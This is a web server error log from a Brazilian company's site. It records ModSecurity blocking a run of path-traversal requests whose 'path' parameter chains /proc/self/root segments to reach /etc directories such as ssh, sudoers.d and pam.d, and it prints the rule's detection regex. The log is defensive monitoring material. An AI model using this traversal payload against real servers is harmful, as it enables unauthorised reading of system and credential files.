[Wed Mar 18 12:00:09.622039 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:55374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9-eyqAr6etmhZHNrQVwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:10.942754 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:55384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9-sdf6f5d65gmYZThfwAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:13.275436 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:55398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9_SmAPhZkrhU8w4l5zgAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:14.660103 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:55408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9_kzinOy1jxa1j4cikgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:16.031224 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:55416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-AOyqAr6etmhZHNrQXAAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:19.703556 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:55428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-A-oXxyEfFpUF8f96RwAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:21.034994 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:41110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-Bda6ubjKNq_cu4aonwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:22.328587 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:41120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-BtY0UrI5A3LftIy8TAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:23.639115 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:41124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-B-yqAr6etmhZHNrQXQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:24.221832 2026] [mime_magic:error] [pid 26799:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:8022] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:00:24.979181 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:41130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-COyqAr6etmhZHNrQYwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:26.487217 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:41132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-CkzinOy1jxa1j4cilAAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:27.812318 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:41136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-C8df6f5d65gmYZThiwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:31.459010 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:41142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-DymAPhZkrhU8w4l52AAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:32.787636 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:47014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-EOyqAr6etmhZHNrQaAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:34.143550 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:47020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-EuyqAr6etmhZHNrQaQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:35.522844 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:47034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-E8df6f5d65gmYZThmQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:36.720067 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:47042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-FCmAPhZkrhU8w4l52gAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:38.098061 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:47054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-FimAPhZkrhU8w4l53gAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:39.415679 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:52944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-F9Y0UrI5A3LftIy8UwAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:40.720346 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:52958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-GNY0UrI5A3LftIy8VQAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:41.758888 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.241.31:59412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-Gew_le52K8_3pV3sGgAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
